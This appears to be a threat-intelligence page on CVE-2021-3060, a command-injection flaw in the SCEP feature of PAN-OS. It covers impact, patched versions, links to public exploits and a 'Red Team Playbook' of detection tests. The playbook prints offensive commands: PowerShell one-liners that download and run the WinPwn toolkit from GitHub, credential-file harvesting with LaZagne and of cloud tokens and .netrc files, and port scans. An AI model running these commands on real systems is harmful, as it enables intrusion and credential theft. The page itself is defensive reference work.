CVE-2021-3060
Overview
This vulnerability is an OS command injection flaw rooted in improper input validation within the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS. The flaw allows crafted input to be executed as system commands due to inadequate sanitization of parameters processed by the SCEP component. The affected component is the SCEP functionality accessible via the GlobalProtect network interfaces on Palo Alto Networks PAN-OS and Prisma Access firewalls.
Vulnerability Description
An OS command injection vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software allows an unauthenticated network-based attacker with specific knowledge of the firewall configuration to execute arbitrary code with root user privileges. The attacker must have network access to the GlobalProtect interfaces to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers with Prisma Access 2.1 Preferred and Prisma Access 2.1 Innovation firewalls are impacted by this issue.
Impact
An unauthenticated attacker with network access to the GlobalProtect interfaces can execute arbitrary OS commands with root privileges, enabling full system compromise. This can result in unauthorized control over firewall operations, data exfiltration, or disruption of network security functions. The attack requires no authentication (PR:N), no user interaction (UI:N), but does require high attack complexity (AC:H) and network access (AV:N). Successful exploitation can lead to complete loss of confidentiality, integrity, and availability of the affected device.
Solution
Palo Alto Networks recommends upgrading affected PAN-OS versions to 8.1.20-h1 or later, 9.0.14-h3 or later, 9.1.11-h2 or later, 10.0.8 or later, and 10.1.3 or later. Prisma Access customers should update to Prisma Access 2.1 Preferred or Innovation firewalls with the latest patches. Detailed patch instructions and version-specific guidance are available in the Palo Alto Networks security advisory at https://security.paloaltonetworks.com/CVE-2021-3060. Administrators should apply these updates promptly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software is characterized by an OS command injection flaw that allows an unauthenticated attacker to execute arbitrary code with root privileges. This vulnerability arises from improper validation of user input, which can be exploited when an attacker crafts specific requests that manipulate the command execution process. The affected versions of PAN-OS include multiple iterations, specifically those prior to certain updates in the 8.1, 9.0, 9.1, 10.0, and 10.1 series. The critical nature of this flaw is underscored by its potential to grant attackers complete control over the affected systems, making it a significant concern for organizations relying on this firewall technology.
Exploitation of this vulnerability requires network access to the GlobalProtect interfaces, which are typically exposed to the internet or internal networks. Attackers with knowledge of the firewall configuration can leverage this access to inject malicious commands. For instance, an attacker could send specially crafted requests that exploit the command injection flaw, allowing them to execute arbitrary commands on the underlying operating system. This could lead to a range of malicious activities, from data exfiltration to the installation of backdoors, thereby compromising the integrity and confidentiality of sensitive information.
The real-world impact of this vulnerability is substantial, particularly for organizations that utilize PAN-OS for their network security. The ability for an attacker to gain root access means that they could manipulate firewall rules, disable security features, or even pivot to other systems within the network. This poses a significant business risk, as it could lead to data breaches, regulatory penalties, and damage to brand reputation. Moreover, the financial implications of a successful attack can be severe, encompassing costs related to incident response, recovery, and potential legal liabilities.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted security strategy. Regularly updating PAN-OS to the latest versions is crucial, as updates often include patches for known vulnerabilities. Additionally, employing intrusion detection systems (IDS) can help identify suspicious activities indicative of exploitation attempts. Network segmentation can also minimize exposure by limiting access to the GlobalProtect interfaces, thereby reducing the attack surface. Furthermore, organizations should conduct regular security assessments and penetration testing to identify potential weaknesses in their configurations and ensure that security best practices are being followed.
In conclusion, the OS command injection vulnerability within the SCEP feature of PAN-OS represents a critical threat that requires immediate attention from affected organizations. By understanding the technical details, potential attack vectors, and real-world implications of this flaw, cybersecurity professionals can better prepare their defenses. Implementing robust detection and mitigation strategies will not only protect against this specific vulnerability but also enhance the overall security posture of the organization.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-3060, rising by over 11% to a current level placing it near the top percentile of predicted exploitation likelihood. This upward trend, coupled with a steady week-over-week increase, signals growing attacker interest and potential exploitation activity targeting the SCEP feature in PAN-OS. Concurrently, new proof-of-concept exploits have surfaced on public repositories, lowering the barrier for adversaries to weaponize this vulnerability. Although the escalation is not classified as rapid, the combination of rising EPSS scores and emerging exploit code heightens the threat landscape for organizations running affected PAN-OS versions. Defenders should interpret this as an indication that exploitation attempts may become more frequent and sophisticated, thus elevating the operational risk associated with this vulnerability beyond prior assessments.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Prisma Access | 2.1 |
cpe:2.3:a:paloaltonetworks:prisma_access:2.1:*:*:*:innovation:*:*:*
|
|
|
Paloaltonetworks | Prisma Access | 2.1 |
cpe:2.3:a:paloaltonetworks:prisma_access:2.1:*:*:*:preferred:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
timb-machine-mirrors/rqu1-cve-2021-3060.py
Clone from gist
|
timb-machine-mirrors | 1 | 1 | 2022-08-03 | View |
|
anmolksachan/CVE-2021-3060
CVE-2021-3060
|
anmolksachan | 0 | 0 | 2023-10-05 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-3060 |
| security.paloaltonetworks.com |
GitHub CVE
x_refsource_MISC
|
https://security.paloaltonetworks.com/CVE-2021-3060 |
| docs.paloaltonetworks.com |
GitHub CVE
x_refsource_MISC
|
https://docs.paloaltonetworks.com/pan-os/10-0/pan-os-admin/certificate-management/configure-the-master-key.html |
| docs.paloaltonetworks.com |
GitHub CVE
x_refsource_MISC
|
https://docs.paloaltonetworks.com/prisma/prisma-access/innovation/2-1/prisma-access-panorama-admin/prepare-the-prisma-access-infrastructure/get-started-with-prisma-access-overview.html |